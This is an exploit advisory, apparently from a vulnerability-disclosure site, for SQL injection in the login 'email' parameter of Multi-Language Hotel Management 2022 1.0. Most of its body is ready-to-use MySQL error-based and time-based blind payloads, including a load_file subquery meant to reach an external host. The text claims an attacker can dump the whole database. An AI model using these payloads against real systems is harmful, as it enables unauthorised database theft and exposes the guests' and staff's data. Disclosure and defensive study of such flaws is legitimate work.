Multi-Language Hotel Management 2022 1.0 SQL Injection

Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes

## Title: Multi-Language-Hotel-Management-2022 1.0 SQLi ## Author: nu11secur1ty ## Date: 08.03.2022 ## Vendor: ## Software: ## Reference: ## Description: The `email` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\\\ais'))+' was submitted in the email parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The attacker can easily get the all database from this hotel system and can do very malicious stuff with the users who are inside of this system. Status: CRITICAL [+] Payloads: ```mysql --- Parameter: email (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload:'+(select load_file('\\\\\\ais'))+''||(SELECT 0x55644a42 WHERE 3972=3972 AND (SELECT 1380 FROM(SELECT COUNT(*),CONCAT(0x7162787671,(SELECT (ELT(1380=1380,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=m5S!k0l!S6&login= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload:'+(select load_file('\\\\\\ais'))+''||(SELECT 0x48536341 WHERE 9809=9809 AND (SELECT 5116 FROM (SELECT(SLEEP(15)))ygbC))||'&password=m5S!k0l!S6&login= --- ``` ## Reproduce: [href]( ## Proof and Exploit: [href](

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023,


Back to Top